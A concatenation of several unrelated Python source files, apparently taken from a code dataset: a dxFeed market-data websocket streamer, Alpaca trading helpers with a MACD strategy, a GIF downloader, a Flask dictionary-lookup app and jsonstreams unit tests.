self.tasty_session = session
self.timeout = timeout
self.connection = None
        self.logged_in = False
self.subs = {}
self.lock = asyncio.Lock()
asyncio.get_event_loop().run_until_complete(
self._setup_connection()
)
def __del__(self):
self.ka_thread.join() # Kill the keep-alive thread
self.connection.close()
def _get_nonce(self):
# NOTE: It seems a mutex is not necessary as long as we
# have no replay of messages (i.e. do not send with same/lower number)
self.nonce = getattr(self, 'nonce', 0) + 1
return self.nonce
async def add_data_sub(self, values):
LOGGER.debug(f'Adding subscription: {values}')
# TODO: fragment message if need be, max 64k
message = [
{
'channel': '/service/sub',
'clientId': self.client_id,
'id': self._get_nonce(),
'data': {
'add': values
}
}
]
await self._send_msg(message)
async def remove_data_sub(self, values):
# NOTE: Experimental, unconfirmed. Needs testing
LOGGER.info(f'Removing subscription: {values}')
message = [
{
'channel': '/service/sub',
'clientId': self.client_id,
'id': self._get_nonce(),
'data': {
'remove': values
}
}
]
await self._send_msg(message)
def _get_login_msg(self) -> str:
auth_token = self.get_streamer_token()
return json.dumps([{
'ext': {
'com.devexperts.auth.AuthToken': f'{auth_token}'
},
'id': self._get_nonce(),
'version': '1.0',
'minimumVersion': '1.0',
'channel': '/meta/handshake',
'supportedConnectionTypes': [
'websocket',
'long-polling',
'callback-polling'
],
'advice': {
'timeout': self.timeout * 1000,
'interval': 0
}
}])
def _get_connect_msg(self, advice=True) -> List:
if advice:
msg = [
{
"advice": {
"timeout": 0
},
"channel": "/meta/connect",
"clientId": self.client_id,
"connectionType": "websocket",
"id": self._get_nonce()
}
]
else:
msg = [
{
"channel": "/meta/connect",
"clientId": self.client_id,
"connectionType": "websocket",
"id": self._get_nonce()
}
]
return msg
async def _consumer(self, message):
msg_object = json.loads(message)
LOGGER.debug('Object conversion: %s', msg_object)
return dxfeed_mapper.map_message(msg_object)
async def _send_msg(self, message):
if not self.logged_in:
raise Exception('Connection not made and logged in')
if not isinstance(message, str):
message = json.dumps(message)
LOGGER.debug('[dxFeed] sending: %s', message)
await self.connection.send(message)
async def reset_data_subs(self):
LOGGER.info('Resetting data subscriptions')
msg = [
{
"channel": "/service/sub",
"clientId": self.client_id,
"data": {
"reset": True
},
"id": self._get_nonce()
}
]
await self._send_msg(msg)
await self.connection.recv()
def get_streamer_token(self):
return self._get_streamer_data()['data']['token']
def _get_streamer_data(self):
if not self.tasty_session.logged_in:
raise Exception('Logged in session required')
if hasattr(self, 'streamer_data_created') and (datetime.datetime.now() - self.streamer_data_created).total_seconds() < 60:
return self.streamer_data
resp = requests.get(f'{self.tasty_session.API_url}/quote-streamer-tokens', headers=self.tasty_session.get_request_headers())
if resp.status_code != 200:
raise Exception('Could not get quote streamer data, error message: {}'.format(
resp.json()['error']['message']
))
self.streamer_data = resp.json()
self.streamer_data_created = datetime.datetime.now()
return resp.json()
def _get_streamer_websocket_url(self):
socket_url = self._get_streamer_data()['data']['websocket-url']
socket_url = socket_url.replace('https://', '')
full_url = 'wss://{}/cometd'.format(socket_url)
return full_url
async def _setup_connection(self):
streamer_url = self._get_streamer_websocket_url()
LOGGER.info('Connecting to url: %s', streamer_url)
socket = await websockets.connect(streamer_url)
# login
LOGGER.debug('Sending login message: %s', self._get_login_msg())
await socket.send(self._get_login_msg())
login_resp = json.loads(await socket.recv())
login_resp = login_resp[0]
advised_timeout = login_resp['advice']['timeout']
LOGGER.debug('Received login response: %s', login_resp)
if not login_resp['successful']:
raise Exception('Could not login to dxFeed stream')
self.client_id = login_resp['clientId']
self.connection = socket
self.logged_in = True
LOGGER.info('Connected and logged in to dxFeed data stream')
await self.reset_data_subs()
# connect
await self._send_msg(self._get_connect_msg())
await socket.recv()
# set up advice-based keep-alives/pings
loop = asyncio.get_event_loop()
self.ka_thread = threading.Thread(
target=self._set_ka_loop,
args=(loop, advised_timeout),
daemon=True
)
self.ka_thread.start()
LOGGER.info('Connection setup completed!')
def _set_ka_loop(self, loop, period):
LOGGER.info('Starting keep-alive thread with period: %s ms', period)
asyncio.run_coroutine_threadsafe(self._keep_alive(period), loop)
async def _keep_alive(self, period: int):
"""
Handles the keep-alive message.
Args:
period: The time period, must be in milliseconds.
"""
while True:
LOGGER.debug('Sending keep-alive message')
await self._send_msg(self._get_connect_msg(advice=False))
await asyncio.sleep(period / 1000)
async def listen(self):
async for msg in self.connection:
LOGGER.debug('[dxFeed] received: %s', msg)
res = await self._consumer(msg)
if not res:
continue
yield res
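# Hypothetical usage sketch (not part of the original module): how the streamer is
# typically driven from an asyncio program. The TastyAPISession constructor
# arguments and the subscription payload below are assumptions for illustration.
#
#     session = TastyAPISession('username', 'password')
#     streamer = DataStreamer(session)
#
#     async def watch():
#         await streamer.add_data_sub({'Quote': ['SPY']})
#         async for item in streamer.listen():
#             LOGGER.info('Received: %s', item)
#
#     asyncio.get_event_loop().run_until_complete(watch())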
``` |
{
"source": "jonowens/cryptoCache",
"score": 4
} |
#### File: cryptoCache/carolina/form.py
```python
from flask import Flask, request, render_template
# Flask constructor
app = Flask(__name__)
# A decorator used to tell the application
# which URL is associated with which function
@app.route('/', methods =["GET", "POST"])
def gfg():
if request.method == "POST":
# getting input with name = fname in HTML form
first_name = request.form.get("fname")
# getting input with name = lname in HTML form
last_name = request.form.get("lname")
return "Your name is "+first_name + last_name
return render_template("form.html")
if __name__=='__main__':
app.run()
``` |
{
"source": "jonowens/mr_si_boller_strategy",
"score": 3
} |
#### File: mr_si_boller_strategy/libs/connections.py
```python
from dotenv import load_dotenv
import os
import requests
import json
import pandas as pd
import alpaca_trade_api as tradeapi
load_dotenv()
key = os.getenv('APCA_API_KEY')
secret_key = os.getenv('APCA_API_SECRET_KEY')
paper_url = os.getenv('APCA_API_PAPER_URL')
current_price = 0.00
class alpaca_trading_connection:
def __init__(self):
self.alpaca_api = tradeapi.REST(key, secret_key, paper_url, api_version='v2')
def get_account_info(self):
res = self.alpaca_api.get_account()
return res
def get_asset_price(self, symbol):
data = self.alpaca_api.get_last_trade(symbol)
return data.price
def get_asset_history(self, symbol, timeframe, num_intervals, starting_date, ending_date):
# Format date range of historical data
start_date = pd.Timestamp(starting_date, tz="America/New_York").isoformat()
end_date = pd.Timestamp(ending_date, tz="America/New_York").isoformat()
# Get historical data
hist_data = self.alpaca_api.get_barset(symbol, timeframe, num_intervals, start=start_date, end=end_date)
# Return data
return hist_data
def place_buy_order(self, symbol, quantity):
order_res = self.alpaca_api.submit_order(symbol, quantity, 'buy', type='market', time_in_force='fok')
return order_res
def place_sell_order(self, symbol, quantity):
order_res = self.alpaca_api.submit_order(symbol, quantity, 'sell', type='market', time_in_force='fok')
return order_res
def close_all_positions(self):
close_all_pos_res = self.alpaca_api.close_all_positions()
return close_all_pos_res
def get_positions(self):
pos_res = self.alpaca_api.list_positions()
return pos_res
# Create and submit buy order and include One Cancels Other (OTO) configuration
def place_buy_otoco_order(self, symbol, quantity, desired_profit_percent: int=2, max_loss_percent: int=1):
# Get current asset price
current_price = self.get_asset_price(symbol)
# Determine profit limit based on passed parameter
profit_price = current_price * (1 + (desired_profit_percent / 100))
# Determine loss trigger based on passed parameter
loss_price = current_price * (1 - ((max_loss_percent) / 100))
# Create One Cancels Other (OCO) dictionaries for bracket
profit_dict = {
'limit_price': profit_price
}
loss_dict = {
'stop_price': loss_price
}
# Submit trade
order_res = self.alpaca_api.submit_order(
symbol,
quantity,
side='buy',
type='market',
time_in_force='gtc',
order_class='bracket',
take_profit=profit_dict,
stop_loss=loss_dict)
return order_res
def get_all_assets_to_trade(self):
# Get all available assets from Alpaca
active_assets = self.alpaca_api.list_assets(status='active')
# Return assets
return active_assets
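# Hypothetical usage sketch (not part of the original module): with a last trade
# price of $100.00, desired_profit_percent=2 and max_loss_percent=1 produce a
# take-profit limit of $102.00 and a stop-loss trigger of $99.00. The symbol and
# quantity below are assumptions for illustration only.
#
#     conn = alpaca_trading_connection()
#     order = conn.place_buy_otoco_order('AAPL', 1, desired_profit_percent=2, max_loss_percent=1)
#     print(order.status)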
```
#### File: mr_si_boller_strategy/libs/strategies.py
```python
import pandas as pd
from stockstats import StockDataFrame as Sdf
def test_macd_strategy(stock_df, stock_symbol):
''' Tests MACD Strategy
Args:
stock_df (df): Asset dataframe containing ticker symbol key and
column headings: 'open', 'close', 'high', 'low', and 'volume'.
Returns:
BUY, SELL, or HOLD string signal
'''
# Sort columns for stockdataframe
data = stock_df[stock_symbol][['open', 'close', 'high', 'low', 'volume']]
# Change from pandas dataframe to stockdataframe
stock = Sdf.retype(data)
# Signal line
signal = stock['macds']
# The MACD that needs to cross the signal line to give you a Buy/Sell signal
macd = stock['macd']
    # Evaluate only the most recent bar for a crossover of the signal line
    # If the MACD crosses the signal line upward
    if macd.iloc[-1] > signal.iloc[-1] and macd.iloc[-2] <= signal.iloc[-2]:
        return 'BUY'
    # The other way around
    elif macd.iloc[-1] < signal.iloc[-1] and macd.iloc[-2] >= signal.iloc[-2]:
        return 'SELL'
    # Do nothing if not crossed
    else:
        return 'HOLD'
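# Hypothetical usage sketch (not part of the original module): the barset returned
# by alpaca_trading_connection.get_asset_history() can be fed in via its .df
# attribute; the symbol and date range below are assumptions for illustration.
#
#     from libs.connections import alpaca_trading_connection
#     conn = alpaca_trading_connection()
#     bars = conn.get_asset_history('AAPL', '1D', 100, '2021-01-04', '2021-06-30')
#     print(test_macd_strategy(bars.df, 'AAPL'))  # 'BUY', 'SELL', or 'HOLD'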
``` |
{
"source": "jonowo/walfie-gif-dl",
"score": 3
} |
#### File: jonowo/walfie-gif-dl/download.py
```python
import itertools
import json
import logging
import os
import re
import shutil
import time
import requests
DOWNLOAD_PATH = "gifs/"
logging.basicConfig(level="INFO", format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
logger = logging.getLogger(__name__)
def get_filename(name) -> str:
# Sanitize filename
fn = "".join(c if c.isalnum() else "_" for c in name)
fn = re.sub("_+", "_", fn)
ext = ".gif"
# Find next available filename
if not os.path.exists(DOWNLOAD_PATH + fn + ext):
return DOWNLOAD_PATH + fn + ext
for i in itertools.count(1):
if not os.path.exists(DOWNLOAD_PATH + fn + str(i) + ext):
return DOWNLOAD_PATH + fn + str(i) + ext
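# Hypothetical usage sketch (not part of the original script): the title is reduced
# to alphanumerics and underscores, and a numeric suffix is appended when the name
# is already taken. The titles below are assumptions for illustration only.
#
#     get_filename("Walfie dance!")   # -> gifs/Walfie_dance_.gif
#     get_filename("Walfie dance!")   # -> gifs/Walfie_dance_1.gif (once the first file exists)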
if os.path.isdir(DOWNLOAD_PATH):
shutil.rmtree(DOWNLOAD_PATH)
os.mkdir(DOWNLOAD_PATH)
with open("data.json") as f:
data = json.load(f)
# Download GIFs
logger.info(f"Downloading {len(data)} GIFs...")
# Download older posts first to make sure their file names are not taken
for post in data[::-1]:
resp = requests.get(post["gif"])
resp.raise_for_status()
fn = get_filename(post["title"])
post["path"] = fn
with open(fn, "wb") as f:
f.write(resp.content)
time.sleep(0.25)
logger.info("Download complete.")
with open("data.json", "w") as f:
json.dump(data, f, indent=4)
``` |
{
"source": "jonowo/wsd",
"score": 2
} |
#### File: wsd/wsd/__init__.py
```python
import html
import json
import logging
import os
from typing import Any, List
logging.basicConfig(level="INFO", format="%(asctime)s - %(name)s - %(levelname)s - %(message)s")
from dotenv import load_dotenv
from flask import Flask, render_template
from .constants import POS_MAPPING, SPACY_EXPLAIN, nlp
from .forms import QueryForm
from .mw import MerriamWebster
logger = logging.getLogger(__name__)
load_dotenv()
app = Flask(__name__)
app.secret_key = os.environ["SECRET_KEY"]
mw_client = MerriamWebster(os.environ["MW_LEARNERS_API_KEY"])
def get_definitions(text: str, base_form: str, pos: str) -> List[Any]:
# Search by base form (e.g. burning -> burn)
res = mw_client.search(base_form)
if not res:
return []
# Exact matches
res = [e for e in res if text == e["base_form"].lower()] or res
# "Stems" of a word contain all its possible forms (e.g. be: is, was, been, etc.)
res = [e for e in res if text in e["stems"]
] or [e for e in res if base_form in e["stems"]] or res
# Filter out senses which are not of the same part of speech identified earlier
res = [e for e in res if e["pos"] in POS_MAPPING.get(pos, [])] or res
return res[:3] # Up to 3 definitions
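# Hypothetical usage sketch (not part of the original module): for the token
# "burning" spaCy yields base form "burn" and POS "VERB", so the lookup searches
# for "burn" and narrows the senses to verb entries. The word is an assumption
# chosen for illustration only.
#
#     entries = get_definitions("burning", "burn", "VERB")
#     for entry in entries:
#         print(entry["base_form"], entry["pos"])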
@app.route("/", methods=["GET", "POST"])
def home():
form = QueryForm()
if form.validate_on_submit():
sentence = form.sentence.data.strip()
logger.info("Query: %s", sentence)
doc = nlp(sentence)
spans = []
for token in doc:
escaped_text = html.escape(token.text)
if token.pos_ in ("PUNCT", "SYM", "SPACE", "X") or not token.text.isalpha():
# No definition
spans.append((escaped_text, token))
continue
if token.pos_ == "PROPN":
spans.append(
(
f'<a class="ss" data-pos-explain="{html.escape(SPACY_EXPLAIN[token.pos_])}">'
+ escaped_text + '</a>', token
)
)
continue
entries = get_definitions(token.text.lower(), token.lemma_, token.pos_)
spans.append(
(
f'<a class="ss" data-pos-explain="{html.escape(SPACY_EXPLAIN[token.pos_])}" '
f'data-defs="{html.escape(json.dumps(entries))}">' + escaped_text + "</a>",
token
)
)
s = sentence
sentence_html = ""
for span, token in spans:
while not s.startswith(token.text):
sentence_html += html.escape(s[0])
s = s[1:]
sentence_html += span
s = s[len(token.text):]
sentence_html += html.escape(s)
mw_client.save_cache()
return render_template("home.html", form=form, sentence=sentence_html)
return render_template("home.html", form=form)
``` |
{
"source": "jonoxia/pencilbox",
"score": 3
} |
#### File: jonoxia/pencilbox/login.py
```python
import cgi
import cgitb
import uuid
import Cookie
import subprocess
import simplejson
from database_tables import Artist
from pencilbox_config import DOMAIN
def verifyBrowserId(assertion):
postargs = "assertion=%s&audience=%s" % (assertion, DOMAIN)
url = "https://browserid.org/verify"
# TODO verify SSL?
process = subprocess.Popen(["curl", "-d", postargs, url],
stdout = subprocess.PIPE )
data = simplejson.loads(process.communicate()[0])
    # expect browserid.org/verify to return fields like this:
    # {
    #     "status": "okay",
    #     "email": "<EMAIL>",
    #     "audience": "mysite.com",
    #     "valid-until": 1308859352261,
    #     "issuer": "browserid.org:443"
    # }
if data["status"] == "okay":
return data["email"]
else:
return False
if __name__ == "__main__":
cgitb.enable()
q = cgi.FieldStorage()
print "Content-type: text/html"
print
assertion = q.getfirst("assertion", "")
email = verifyBrowserId(assertion)
if (email == False):
print simplejson.dumps({"logged_in": "false"})
else:
session = str(uuid.uuid1())
matches = Artist.selectBy( email = email )
if (matches.count() == 0):
# user has not logged in before: create account
kwargs = {"email": email,
"name": email.split("@")[0], # use first part of email address as username
"session": session}
newUser = Artist(**kwargs)
else:
oldUser = matches[0]
oldUser.session = session
# Return JSON to the client's XHR containing email and session uuid
print simplejson.dumps({"logged_in": "true", "email": email, "session": session})
```
#### File: jonoxia/pencilbox/save.py
```python
from database_tables import DrawingHistory
from webserver_utils import verify_id
import cgi
import cgitb
import datetime
def createNew(title, creator, history, layers):
kwargs = {"date": datetime.datetime.now(),
"title": title,
"history_json": history,
"layer_json": layers,
"creator": creator}
newEntry = DrawingHistory(**kwargs)
def updateOld(entry, history, layers):
entry.date = datetime.datetime.now()
entry.history_json = history
entry.layer_json = layers
cgitb.enable()
q = cgi.FieldStorage()
history = q.getfirst("history", "")
layers = q.getfirst("layers", "")
title = q.getfirst("title", "")
artist = verify_id()
matches = DrawingHistory.selectBy(title = title, creator=artist)
if matches.count() > 0:
updateOld(matches[0], history, layers)
else:
createNew(title, artist, history, layers)
print "Content-type: text/html"
print
print "OK, saved"
```
#### File: jonoxia/pencilbox/webserver_utils.py
```python
import Cookie
import os
import sys
import string
from pencilbox_config import TEMPLATE_DIR, ARTIST_FILE_BASE_DIR
from database_tables import Artist
def render_template_file( filename, substitutionDict ):
file = open( os.path.join( TEMPLATE_DIR, filename ), "r")
template = string.Template(file.read())
file.close()
return template.substitute( substitutionDict )
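# Hypothetical usage sketch (not part of the original module): string.Template
# substitutes "$name"-style placeholders, so a template containing "Hello, $name"
# rendered with {"name": "jono"} becomes "Hello, jono". The template filename is
# an assumption for illustration only.
#
#     page = render_template_file("profile.html", {"name": "jono"})
#     print "Content-type: text/html"
#     print
#     print page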
def print_redirect(url, cookie = None):
print "Status: 302" # temporary redirect
if cookie:
print cookie
print "Location: " + url
print
def logout():
artist = verify_id()
artist.session = ""
antimatter_cookie = Cookie.SimpleCookie()
antimatter_cookie["email"] = artist.email
antimatter_cookie["email"]["expires"] = 0
antimatter_cookie["session"] = artist.session
antimatter_cookie["session"]["expires"] = 0
print_redirect("index.html", antimatter_cookie)
def verify_id():
if os.environ.has_key('HTTP_COOKIE'):
cookie = Cookie.SimpleCookie(os.environ['HTTP_COOKIE'])
if cookie.has_key("email") and cookie.has_key("session"):
matches = Artist.selectBy(email = cookie["email"].value,
session = cookie["session"].value)
if matches.count() > 0:
if matches[0].session != "":
return matches[0]
# If verification fails, kick 'em back out to index.html
print_redirect("index.html")
sys.exit(1)
def get_dir_for_artist(artist, subdir):
# subdir should be "tmp" for temp files and "pub" for published files
# creates it if it doesn't already exist.
dir = os.path.join(ARTIST_FILE_BASE_DIR, "%d" % artist.id)
if not (os.path.isdir(dir)):
os.mkdir(dir)
dir = os.path.join(dir, subdir)
if not (os.path.isdir(dir)):
os.mkdir(dir)
return dir
``` |
{
"source": "JonoYang/jsonstreams",
"score": 2
} |
#### File: jsonstreams/tests/test_stream.py
```python
import json
import textwrap
import pytest # type: ignore
import six
from six.moves import range
import jsonstreams
_ENCODER = json.JSONEncoder() # type: ignore
# pylint: disable=no-self-use
class TestStream(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
s = jsonstreams.Stream(jsonstreams.Type.object, filename='foo')
s.write('foo', 'bar')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_fd(self):
with open('foo', 'w') as f:
with jsonstreams.Stream(jsonstreams.Type.object, fd=f) as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_context_manager(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_context_manager_sub(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
with s.subarray('foo') as a:
with a.subarray() as b:
with b.subobject() as c:
with c.subobject('bar') as _:
pass
def test_sub(self):
s = jsonstreams.Stream(jsonstreams.Type.object, filename='foo')
a = s.subarray('foo')
b = a.subarray()
c = b.subobject()
d = c.subobject('bar')
d.close()
c.close()
b.close()
a.close()
s.close()
def test_write_two(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
s.write('foo', 'bar')
s.write('bar', 'foo')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "bar": "foo"}'
def test_subobject(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo') as s:
s.write('foo', 'bar')
with s.subobject('bar') as b:
b.write('1', 'foo')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "bar": {"1": "foo"}}'
def test_subarray(self):
with jsonstreams.Stream(jsonstreams.Type.array, filename='foo') as s:
s.write('foo')
with s.subarray() as b:
b.write(1)
b.write(2)
with open('foo', 'r') as f:
assert f.read() == '["foo", [1, 2]]'
def test_encoder_indent(self):
with jsonstreams.Stream(jsonstreams.Type.object, filename='foo',
indent=4) as s:
s.write('oink', {'bar': {'b': 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
{
"oink": {
"bar": {
"b": 0
}
}
}""")
def test_pretty(self):
with jsonstreams.Stream(jsonstreams.Type.array, filename='foo',
indent=4, pretty=True) as s:
s.write({'bar': {"b": 0}})
s.write({'fob': {"f": 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
[
{
"bar": {
"b": 0
}
},
{
"fob": {
"f": 0
}
}
]""")
class TestIterWrite(object):
"""Tests for the iterwrite object."""
class TestArray(object):
"""Tests for array object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with jsonstreams.Stream(
jsonstreams.Type.array, filename='foo') as s:
s.iterwrite(range(5))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5))
def test_mixed(self):
with jsonstreams.Stream(
jsonstreams.Type.array, filename='foo') as s:
s.iterwrite(range(5))
s.write('a')
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == list(range(5)) + ['a']
class TestObject(object):
"""Tests for array object."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with jsonstreams.Stream(
jsonstreams.Type.object, filename='foo') as s:
s.iterwrite(
((str(s), k) for s in range(5) for k in range(5)))
with open('foo', 'r') as f:
actual = json.load(f)
assert actual == {str(s): k for s in range(5) for k in range(5)}
def test_mixed(self):
with jsonstreams.Stream(
jsonstreams.Type.object, filename='foo') as s:
s.iterwrite(
((str(s), k) for s in range(5) for k in range(5)))
s.write("6", 'a')
with open('foo', 'r') as f:
actual = json.load(f)
expected = {str(s): k for s in range(5) for k in range(5)}
expected['6'] = 'a'
assert actual == expected
class TestObject(object):
def test_init(self):
with open('foo', 'w') as f:
jsonstreams.Object(f, 0, 0, _ENCODER)
with open('foo', 'r') as f:
assert f.read() == '{'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as _:
pass
with open('foo', 'r') as f:
assert f.read() == '{}'
class TestWrite(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
class TestWithoutIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar"}'
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
s.write('bar', 'foo')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "bar": "foo"}'
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', {"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == '{"foo": {"1": "bar"}}'
class TestWithIndent(object):
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_write_one(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"foo": "bar"
}""")
def test_write_two(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
s.write('foo', 'bar')
s.write('bar', 'foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"foo": "bar",
"bar": "foo"
}""")
def test_complex(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
s.write('foo', {"1": 'bar'})
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"foo": {"1": "bar"}
}""")
@pytest.mark.parametrize("key,value,expected", [ # type: ignore
("foo", "bar", '{"foo": "bar"}'),
("foo", 1, '{"foo": 1}'),
("foo", 1.0, '{"foo": 1.0}'),
("foo", None, '{"foo": null}'),
("foo", ["bar"], '{"foo": ["bar"]}'),
("foo", {"foo": "bar"}, '{"foo": {"foo": "bar"}}'),
("foo", ["foo"], '{"foo": ["foo"]}'),
])
def test_types(self, key, value, expected):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write(key, value)
with open('foo', 'r') as f:
assert f.read() == expected
@pytest.mark.parametrize("key", [1, 1.0, None])
def test_invalid_key_types(self, key):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with pytest.raises(jsonstreams.InvalidTypeError):
s.write(key, 'foo')
def test_pretty(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, json.JSONEncoder(indent=4),
pretty=True) as s:
s.write("1", {'bar': {"b": 0}})
s.write("2", {'fob': {"f": 0}})
with open('foo', 'r') as f:
actual = f.read()
assert actual == textwrap.dedent("""\
{
"1": {
"bar": {
"b": 0
}
},
"2": {
"fob": {
"f": 0
}
}
}""")
class TestSubobject(object):
"""Tests for the suboboject method."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subobject('ook')
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"foo": "bar"}}'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"foo": "bar"}}'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 4, 0, _ENCODER)
p = s.subobject('ook')
p.write('foo', 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": {
"foo": "bar"
}
}""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": {
"foo": "bar"
}
}""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write('foo', 'bar')
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"foo": "bar", "1": "bar"}}'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
with s.subobject('ook') as p:
p.write("1", 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"foo": "bar", "ook": {"1": "bar"}}'
def test_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subobject('ook') as p:
p.write("1", 'bar')
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == '{"ook": {"1": "bar"}, "foo": "bar"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write("1", 'bar')
with s.subobject('ook') as p:
p.write("1", 'bar')
s.write('foo', 'bar')
with open('foo', 'r') as f:
assert f.read() == \
'{"1": "bar", "ook": {"1": "bar"}, "foo": "bar"}'
class TestNested(object):
"""Test various nested configurations."""
def test_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subobject("2")
p.write("1", 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": {"1": "bar"}}'
def test_outer_inner(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write("1", 'foo')
p = s.subobject("2")
p.write("1", 'bar')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"1": "foo", "2": {"1": "bar"}}'
def test_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subobject("2")
p.write("1", 'bar')
p.close()
s.write("1", 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"2": {"1": "bar"}, "1": "foo"}'
def test_outer_inner_outer(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
s.write('1', 'foo')
p = s.subobject('2')
p.write('1', 'bar')
p.close()
s.write('3', 'foo')
s.close()
with open('foo', 'r') as f:
assert f.read() == \
'{"1": "foo", "2": {"1": "bar"}, "3": "foo"}'
class TestSubarray(object):
"""Tests for the subarray method."""
@pytest.fixture(autouse=True)
def chdir(self, tmpdir):
tmpdir.chdir()
def test_basic(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 0, 0, _ENCODER)
p = s.subarray('ook')
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == '{"ook": ["foo"]}'
def test_context_manager(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == '{"ook": ["foo"]}'
def test_indent(self):
with open('foo', 'w') as f:
s = jsonstreams.Object(f, 4, 0, _ENCODER)
p = s.subarray('ook')
p.write('foo')
p.close()
s.close()
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": [
"foo"
]
}""")
def test_context_manager_indent(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 4, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write('foo')
with open('foo', 'r') as f:
assert f.read() == textwrap.dedent("""\
{
"ook": [
"foo"
]
}""")
class TestNestedContextManager(object):
"""Test various nested configurations with context managers."""
def test_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
with s.subarray('ook') as p:
p.write('foo')
p.write(1)
with open('foo', 'r') as f:
assert f.read() == '{"ook": ["foo", 1]}'
def test_outer_inner(self):
with open('foo', 'w') as f:
with jsonstreams.Object(f, 0, 0, _ENCODER) as s:
s.write('foo', 'bar')
with s.subarray('ook') as p:
p.write(1)
with open('foo', 'r') as f:
